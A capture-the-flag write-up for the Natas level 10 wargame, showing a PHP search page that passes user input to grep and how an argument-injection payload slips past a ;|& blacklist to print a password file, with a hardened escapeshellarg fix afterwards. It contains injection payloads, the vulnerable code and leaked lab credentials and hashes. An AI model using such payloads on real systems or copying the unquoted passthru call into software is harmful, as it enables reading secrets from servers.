Challenge:
Same as the last one, but now: "For security reasons, we now filter on certain characters."

Solving it:
Let's have a look at the source code:

<html>
<body>
<h1>natas10</h1>
<div id="content">

For security reasons, we now filter on certain characters<br/><br/>
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>


Output:
<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>
</pre>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

Reading the code, we can conclude that the characters ;, | and & are no longer allowed, since the regex /[;|&]/ matches any one of them, and maybe / as well. If we enter any of these we should get the message "Input contains an illegal character!". Correct: when I input & and ; we get "Input contains an illegal character!". Good to know. But / is allowed, because the / in preg_match('/[;|&]/') is only the regex delimiter, not part of the character class.

Maybe we can use URL encoding? So let's take the old payload, "needle dictionary.txt && cat /etc/natas_webpass/natas10 &&", and change each & to its URL-encoded form, %26.

Old payload: needle dictionary.txt && cat /etc/natas_webpass/natas10 &&
New payload: needle dictionary.txt %26%26 cat /etc/natas_webpass/natas10 %26%26

Nope, this did not work: PHP decodes %26 back to & before the value lands in $_REQUEST, so the filter still sees the & and rejects it. I read about shell control operators and learned that # could be used to comment out the rest of the line. Good to know, but I didn't find another operator I could use. Maybe we can instead get grep itself to read the file for us and print it. Let's make another list of the command, the injection point, the payload and the full command, to see for ourselves how it works and whether it would work.

Command: grep -i $key dictionary.txt
Injection point: $key
Payload: .* /etc/natas_webpass/natas10 #
Full command: grep -i .* /etc/natas_webpass/natas10 # dictionary.txt

The pattern .* matches every line, so this should make grep print the whole /etc/natas_webpass/natas10 file, and with # the trailing dictionary.txt part is commented out. Let's fill in the payload and try it out.

We found the password for natas10. But wait, I'm already on 10; we need to change this to 11, haha.
Payload: .* /etc/natas_webpass/natas11 #

Output (the unquoted .* is also expanded by the shell as a glob matching the dotfiles .htaccess and .htpasswd in the web root, which is why their contents show up alongside the password file):

.htaccess:AuthType Basic
.htaccess: AuthName "Authentication required"
.htaccess: AuthUserFile /var/www/natas/natas10//.htpasswd
.htaccess: require valid-user
.htpasswd:natas10:$1$XOXwo/z0$K/6kBzbw4cQ5exEWpW5OV0
.htpasswd:natas10:$1$mRklUuvs$D4FovAtQ6y2mb5vXLAy.P/
.htpasswd:natas10:$1$SpbdWYWN$qM554rKY7WrlXF5P6ErYN/
/etc/natas_webpass/natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK
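As an added example (not part of this write-up or the Natas source), here is the same lookup rebuilt so that whatever the user types can only ever be a grep pattern, never extra shell syntax or an extra filename. The function name safe_grep_command is my own; everything else is standard PHP and GNU grep.

```php
<?php
// Hardened version of the natas10 lookup: no character blacklist, instead the
// user value is quoted as a single shell argument and the file list is fixed.
function safe_grep_command(string $needle): string {
    // escapeshellarg() wraps the value in single quotes and escapes embedded
    // quotes, so spaces, "/", "#", ";" and "&" all reach grep as literal pattern
    // text. The shell never sees them as operators or as a separate argument.
    $pattern = escapeshellarg($needle);

    // -e binds the pattern explicitly (a needle starting with "-" cannot be
    // parsed as an option), -- ends option parsing, and dictionary.txt is the
    // only file grep is ever given. Use -F as well if users should not be able
    // to supply regular-expression metacharacters at all.
    return "grep -i -e $pattern -- dictionary.txt";
}

$key = "";
if (array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if ($key !== "") {
    // A deny-list of ";|&" would still let ".* /etc/natas_webpass/natas11 #"
    // through, because that payload needs none of those characters; quoting the
    // whole value makes it a harmless (and probably unmatched) search pattern.
    passthru(safe_grep_command($key));
}
```

With this change the payload from the write-up becomes a literal pattern searched for inside dictionary.txt only, and the .htaccess/.htpasswd lines disappear because no shell glob expansion happens inside the quoted argument.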
